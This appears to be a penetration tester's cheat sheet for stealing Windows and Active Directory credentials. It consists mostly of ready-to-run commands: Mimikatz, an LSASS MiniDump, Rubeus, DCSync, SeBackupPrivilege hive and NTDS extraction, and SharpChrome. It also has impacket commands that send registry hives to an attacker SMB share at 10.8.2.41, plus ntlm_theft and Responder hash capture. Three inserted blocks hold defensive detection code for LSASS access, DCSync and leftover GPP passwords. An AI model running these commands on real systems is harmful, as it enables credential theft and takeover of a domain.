Access Tokens

Mimikatz

NTLM hashes

This command requires elevated privileges.

sekurlsa::logonpasswords

Kerberos Encryption keys

This command requires elevated privileges.

sekurlsa::ekeys

SAM

This command requires elevated privileges.

lsadump::sam
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 2661 C:\Windows\Temp\lsass.dmp full
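Both commands above open a handle to LSASS (Mimikatz directly, the comsvcs.dll variant via rundll32), which is what a defender watches for. The following is an added example, not part of these notes, that flags both patterns in parsed Sysmon events; the sample events are constructed, and SOURCE_ALLOWLIST is an assumption about which processes legitimately touch lsass.exe in a given estate.

```python
import re

PROCESS_VM_READ = 0x0010  # MiniDumpWriteDump cannot work without this right

# Assumed: processes that legitimately open lsass.exe in this environment.
SOURCE_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

COMSVCS_MINIDUMP = re.compile(r"comsvcs(\.dll)?\s*,?\s*minidump\b", re.IGNORECASE)

def lsass_access_alert(ev):
    """Sysmon event 10: a non-allowlisted process opened lsass.exe for reading."""
    if ev.get("EventID") != 10 or not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    if ev["SourceImage"].lower() in SOURCE_ALLOWLIST:
        return None
    granted = int(ev["GrantedAccess"], 16)
    if granted & PROCESS_VM_READ:
        return f"lsass read access 0x{granted:x} from {ev['SourceImage']}"
    return None

def comsvcs_alert(ev):
    """Sysmon event 1 / Security 4688: rundll32 invoking comsvcs.dll MiniDump."""
    if ev.get("EventID") != 1:
        return None
    cmd = ev.get("CommandLine", "")
    if "rundll32" in cmd.lower() and COMSVCS_MINIDUMP.search(cmd):
        return f"comsvcs MiniDump via rundll32: {cmd}"
    return None

def scan(events):
    """Run every rule over every event; returns the list of alert strings."""
    return [hit for ev in events for rule in (lsass_access_alert, comsvcs_alert)
            if (hit := rule(ev))]

# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Users\bfarmer\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 2661 C:\Windows\Temp\lsass.dmp full"},
]
```

The svchost.exe sample is left alone because 0x1000 (query limited information) does not include VM_READ, which is the right an actual dump needs.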

Domain Cached Credentials

Domain Cached Credentials (DCC) was designed for instances where domain credentials are required to logon to a machine, even whilst it’s disconnected from the domain (think of a roaming laptop for example).  The local device caches the domain credentials so authentication can happen locally, but these can be extracted and cracked offline to recover plaintext credentials.

Unfortunately, the hash format is not NTLM, so it can’t be used for pass-the-hash. The only viable use for these is to crack them offline.

lsadump::cache

To crack these with hashcat, we need to transform them into the expected format. The hashcat example hashes page shows the format should be $DCC2$<iterations>#<username>#<hash>.

Extracting Kerberos Tickets

Rubeus.exe triage

Each user has their own logon session, which is represented by a LUID (locally unique identifier).  In this example, we’re operating within the LUID of bfarmer, 0x14b5fa.  The WKSN-2$ machine account has its own session, 0x3e4; and jking also has a session, 0x7049f.  Tickets for the service name krbtgt are Ticket Granting Tickets (TGTs) and others are Ticket Granting Service Tickets (TGSs).

Rubeus’ dump command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS.  If not elevated, we can only pull tickets from our own session.  Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the /luid and /service parameters.

Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap

DCSync

The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers.  DCSync is a technique which leverages this protocol to extract username and credential data from a DC.
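Because DCSync is just a replication request, it shows up in Security event 4662 as a directory-service access whose Properties list the replication control-access rights, requested by something that is not a domain controller. The following is an added detection example, not part of these notes; the 4662 records are constructed, and DC_ACCOUNTS is an assumption about which machine accounts are the domain's DCs.

```python
# Control-access-right GUIDs that the MS-DRSR GetNCChanges call needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# Assumed: machine accounts of the domain controllers, which replicate legitimately.
DC_ACCOUNTS = {"dc01$", "dc02$"}

def dcsync_alert(event):
    """Return a description string if the 4662 event looks like DCSync, else None."""
    if event.get("EventID") != 4662:
        return None
    props = event.get("Properties", "").lower()
    rights = sorted(g for g in REPLICATION_RIGHTS if g in props)
    if not rights:
        return None  # some other directory-service access
    if event.get("SubjectUserName", "").lower() in DC_ACCOUNTS:
        return None  # normal DC-to-DC replication
    return (f"DCSync: {event['SubjectUserName']} ({event.get('SubjectDomainName', '?')}) "
            f"requested {', '.join(rights)}")

def scan(events):
    """Apply dcsync_alert to every event and keep the hits."""
    return [alert for alert in map(dcsync_alert, events) if alert]

# Constructed sample events shaped like parsed 4662 fields (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "Properties": "Control Access\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "bfarmer", "SubjectDomainName": "CORP",
     "Properties": "Control Access\n{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}\n"
                   "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"EventID": 4662, "SubjectUserName": "jking", "SubjectDomainName": "CORP",
     "Properties": "Write Property\n{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Matching is case-insensitive because the GUID casing in the Properties field varies between log collectors.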

SeBackupPrivilege

nxc smb 10.10.79.103 -u 'Caroline.Robinson' -p 'Password123' -M backup_operator

Sliver

Standalone systems

execute -o cmd /c "reg save HKLM\system system"
execute -o cmd /c "reg save HKLM\sam sam"
download sam
download system

Domain Controller

nxc smb <ip> -u username -p password -M backup_operator

jay.dsh file

set context persistent nowriters
add volume c: alias malleum
create
expose %malleum% m:

unix2dos malleum.dsh
upload malleum.dsh (C:\windows\temp)
mv se_backup_privilege.dsh C:\windows\tasks
diskshadow /s jay.dsh
robocopy /b m:\windows\ntds . ntds.dit
execute -o cmd /c "reg save HKLM\system system"
download system
download ntds.dit
secretsdump.py -system system -ntds ntds.dit LOCAL

Using impacket

sudo smbserver.py share . -smb2support
reg.py baby.vl/caroline.robinson:'Password123!'@10.10.127.198 save -keyName 'HKLM\SAM' -o '\\10.8.2.41\share\'
reg.py baby.vl/caroline.robinson:'Password123!'@10.10.127.198 save -keyName 'HKLM\SYSTEM' -o '\\10.8.2.41\share\'
reg.py baby.vl/caroline.robinson:'Password123!'@10.10.127.198 save -keyName 'HKLM\SECURITY' -o '\\10.8.2.41\share\'

Extracting the password

secretsdump.py -system system -sam sam LOCAL

With Machine Account

 getST.py -self -impersonate "Administrator" -altservice "cifs/ms01.mist.htb" -k -no-pass -dc-ip 192.168.100.100 mist.htb/'ms01$'

nxc smb MS01.mist.htb --use-kcache --lsa

NTLM theft by uploading files to an SMB share

https://github.com/Greenwolf/ntlm_theft

python3 ntlm_theft.py -g all -s 10.8.2.41 -f test
mv test* ../../vulnlab/breach
smbclient //10.10.124.219/share
mput *
hashcat hashes.txt /usr/share/wordlists/rockyou.txt
sudo responder -I tun0

NTLM theft after uploading a media file.

python3 ntlm_theft.py -g m3u,wax,asx -s 10.8.2.41 -f media
mv media* ../../vulnlab/media

Try uploading m3u, asx, wax files.

sudo responder -I tun0

DPAPI

  • After privilege escalation, try this:
sharpdpapi machinetriage /showall

Here’s how it generally works:

  1. Credential gathering: the attacker must first obtain the necessary credentials or keys, for example through credential dumping, memory scraping, or stealing registry hives (the SYSTEM and SECURITY hives).
  2. Registry hive access: the attacker extracts the SYSTEM and SECURITY hives from the target machine. These hives contain the Master Keys used by DPAPI to encrypt and decrypt data.
  3. Master Key decryption: using the credentials or keys obtained, the attacker decrypts the Master Keys stored in the registry hives.
  4. Decrypting secrets: with the Master Keys, SharpDPAPI can then decrypt the DPAPI-protected secrets found on the machine, including browser passwords, Wi-Fi keys, and other sensitive information.

Nanodump

nanodump 572 test 1 PMDM
download test
python3 -m pypykatz lsa minidump test

SharpChrome

sharpchrome -s -- logins /browser:edge

Windows Local Credentials (Administrator)

Shared Administrator Password

  • Get the computer name
$env:computername
  • Get the SID of the Administrator account on that computer
[wmi] "Win32_UserAccount.Domain='client',Name='Administrator'"
  • Obtain the credential from the SAM database
  • The credential is located at C:\Windows\System32\config\SAM
  • The system holds an exclusive lock on it, so we can’t download it even with an admin shell
  • On Server editions you can use VSS (Volume Shadow Copy); this works on 8.1 or later
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows

Now copy the SAM database file from the path provided in the output

copy $PATH C:\users\jay\Downloads\sam

It is typically encrypted with RC4 or AES.

  • The encryption keys are stored in the SYSTEM hive, so we copy that as well
copy $PATH C:\users\jay\Downloads\system

You can also use

reg save HKLM\sam $OutputPATH

Decrypt using impacket, mimikatz, or creddump7.

  • Now try password reuse against other machines

Hardening Local Administrator (Group Policy Preferences)

  • If the account is disabled (the default on 8.1 and later) this attack can be prevented.
  • But sometimes this account is required.
  • Microsoft introduced Group Policy Preferences.
  • It helps to centrally change the Administrator password.
  • In this approach the password is stored in an XML file in SYSVOL, which is shared to every computer.
  • Microsoft encrypted it with AES-256, but the encryption key was leaked.
  • A 2014 security update removed the ability to set passwords via Group Policy Preferences, but the existing preferences containing passwords were not removed.
  • The new approach, LAPS, arrived in 2015.
  • It adds two new attributes: ms-Mcs-AdmPwdExpirationTime and ms-Mcs-AdmPwd.
  • Access to these attributes is locked down.
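Since the 2014 update left existing preference files in place, the defensive follow-up is to audit SYSVOL for XML items that still carry a cpassword attribute. The following is an added example, not part of these notes, that reports such items without decrypting anything; the three XML documents are constructed samples and the cpassword values are placeholders.

```python
import xml.etree.ElementTree as ET

# GPP item types name their account differently (Groups/Drives/DataSources use
# userName, ScheduledTasks uses runAs, Services uses accountName).
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")

def find_cpasswords(xml_text, source):
    """One finding per element that still has a cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if "cpassword" not in elem.attrib:
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
        findings.append({"source": source, "item": elem.tag, "account": account,
                         "has_value": elem.attrib["cpassword"] != ""})
    return findings

def audit(files):
    """files maps a SYSVOL-relative path to its XML text; returns every finding."""
    return [f for path, text in files.items() for f in find_cpasswords(text, path)]

def needs_cleanup(findings):
    """Only a non-empty cpassword still exposes a recoverable password."""
    return [f for f in findings if f["has_value"]]

# Constructed samples (real files also carry clsid/uid GUIDs, omitted here).
SAMPLE_FILES = {
    r"Machine\Preferences\Groups\Groups.xml": """<Groups>
  <User name="Administrator (built-in)" changed="2014-03-01 10:00:00">
    <Properties action="U" cpassword="PLACEHOLDER_BASE64_BLOB" userName="Administrator (built-in)"/>
  </User>
</Groups>""",
    r"Machine\Preferences\ScheduledTasks\ScheduledTasks.xml": """<ScheduledTasks>
  <Task name="NightlyBackup">
    <Properties runAs="CORP\\svc_backup" cpassword="PLACEHOLDER_BASE64_BLOB"/>
  </Task>
</ScheduledTasks>""",
    r"User\Preferences\Drives\Drives.xml": """<Drives>
  <Drive name="H:">
    <Properties action="U" path="\\\\fs01\\home" userName="" cpassword=""/>
  </Drive>
</Drives>""",
}

if __name__ == "__main__":
    for f in needs_cleanup(audit(SAMPLE_FILES)):
        print(f"{f['source']}: {f['item']} for {f['account']!r} still has a cpassword")
```

Drives.xml is reported but not flagged for cleanup because its cpassword is empty, which is what a preference looks like after the password has been removed.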

Getting the cleartext password from LAPS, if it is in use.

Import-module .\LAPSToolkit.ps1
Get-LAPSComputers
  • Find the groups that can read the password
Find-LAPSDelegatedGroups
  • Get the members of that group (PowerView)
Get-NetGroupMember -GroupName "LAPS Password Readers"
  • These rights are typically granted to server admins or the help desk.

Volatility

Volatility 3 Overview

Volatility 3 is an advanced memory forensics framework used to extract digital artifacts from volatile memory (RAM) dumps. It is widely used in incident response, malware analysis, and digital forensics investigations. The tool supports analysis of memory dumps from various operating systems, including Windows, Linux, and macOS.

Key Features of Volatility 3

  1. Memory Analysis: Analyze memory dumps to extract information about running processes, open network connections, loaded drivers, and more.
  2. Artifact Extraction: Retrieve various artifacts such as registry hives, files, and user credentials from memory dumps.
  3. Malware Detection: Identify malicious code and rootkits residing in memory.
  4. Cross-Platform Support: Supports memory dumps from different operating systems.

Using Volatility 3 to Extract Credentials from a Memory Dump

To use Volatility 3 to extract credentials from a memory dump, follow these steps:

  1. Download and Install Volatility 3: Ensure Volatility 3 is installed as described in the previous steps.

  2. Identify the Profile: Determine the profile of the memory dump. Volatility 3 uses “automagic” to automatically determine the profile.

  3. Run Volatility 3 Plugins: Use relevant plugins to extract credentials and other sensitive information.

Example Commands

Here’s a sequence of commands to run Volatility 3 and extract credentials:

  1. Extract Basic Information:

    python3 vol.py -f memory.dmp windows.info
  2. Extract Cached Domain Credentials:

    python3 vol.py -f memory.dmp windows.cachedump.Cachedump
  3. Extract LSA Secrets:

    python3 vol.py -f memory.dmp windows.lsadump.Lsadump
  4. Dump Hashes:

    python3 vol.py -f memory.dmp windows.hashdump.Hashdump

Generating password candidates

vim wordlist.txt
Spring
Fall
Autumn
Winter
Summer
Lustrous
lustrous
for i in $(cat wordlist.txt);do echo $i;echo ${i}2022;echo ${i}2023;echo ${i}2024;done > t
vim append_exclamation.rule
:
$!
$@
hashcat --force t -r append_exclamation.rule -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words.txt